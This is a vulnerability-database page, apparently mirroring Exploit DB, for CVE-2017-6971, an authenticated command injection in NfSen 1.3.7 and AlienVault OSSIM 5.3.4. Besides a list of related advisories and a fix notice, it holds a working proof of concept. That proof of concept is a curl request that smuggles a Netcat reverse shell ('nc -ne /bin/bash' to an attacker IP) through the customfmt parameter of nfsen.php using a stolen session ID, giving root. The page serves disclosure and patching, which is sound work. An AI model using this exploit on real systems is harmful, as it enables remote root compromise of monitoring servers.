Lucene search
K

NfSen 1.3.7 AlienVault OSSIM 5.3.4 - Command Injection

🗓️ 10 Jul 2017 00:00:00Reported by Paul TaylorType 
exploitpack
 exploitpack
👁 62 Views

Remote root exploit in NfSen/AlienVault OSSIM 5.3.

Related
Code
ReporterTitlePublishedViews
Family
0day.today
NfSen <= 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection Vulnerability
10 Jul 201700:00
zdt
Circl
CVE-2017-6971
10 Jul 201700:00
circl
CNVD
AlienVault USM/OSSIM/NfSen Remote Code Execution Vulnerability
23 Mar 201700:00
cnvd
Check Point Advisories
AlienVault OSSIM Remote Code Execution (CVE-2017-6971)
24 Sep 202000:00
checkpoint_advisories
CVE
CVE-2017-6971
22 Mar 201714:00
cve
Cvelist
CVE-2017-6971
22 Mar 201714:00
cvelist
Dsquare
AlienVault OSSIM 5.3.4 RCE
2 Sep 201700:00
dsquare
Exploit DB
NfSen &lt; 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection
10 Jul 201700:00
exploitdb
NVD
CVE-2017-6971
22 Mar 201714:59
nvd
OSV
CVE-2017-6971
22 Mar 201714:59
osv
Rows per page
# Exploit Title: NfSen/AlienVault remote root exploit (IPC query command injection)
# Version: NfSen 1.3.6p1, 1.3.7 and 1.3.7-1~bpo80+1_all. Previous versions are also likely to be affected.
# Version: AlienVault 5.3.4
# Date: 2017-07-10
# Vendor Homepage: http://nfsen.sourceforge.net/
# Vendor Homepage: http://www.alienvault.com/
# Software Link: https://sourceforge.net/projects/nfsen/files/stable/nfsen-1.3.7/nfsen-1.3.7.tar.gz/download
# Exploit Author: Paul Taylor / Foregenix Ltd
# Website: http://www.foregenix.com/blog
# Tested on: AlienVault USM 5.3.4
# CVE: CVE-2017-6971
1. Description

A remote authenticated attacker (or an attacker with a stolen PHP Session ID) can gain complete control over the system by sending a crafted request containing control characters and shell commands which will be executed as root on a vulnerable system.

2. Proof of Concept
# From a linux bash prompt on the attacker's machine:

# Set target IP
targetip='10.100.1.1'

# Set desired command to inject (in this case a reverse shell, using Netcat which is conveniently available on an AlienVault USM All-In-One):
cmd='nc -ne /bin/bash 10.100.1.2 443';

# Set the PHPSESSID of an authenticated session which has *already* submitted at least one valid NfSen query for processing via the Web UI.
PHPSESSID='offq09ckq66fqtvdd0vsuhk5c7';

# Next use curl to send the exploit
curl -o /dev/null -s -k -b "PHPSESSID=$PHPSESSID" -d "process=Process&output=custom+...&customfmt=%0A.%0Arun-nfdump%0Aargs=-h; $cmd #" https://$targetip/ossim/nfsen/nfsen.php

3. Solution:

Update to latest version of NfSen/USM/OSSIM

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation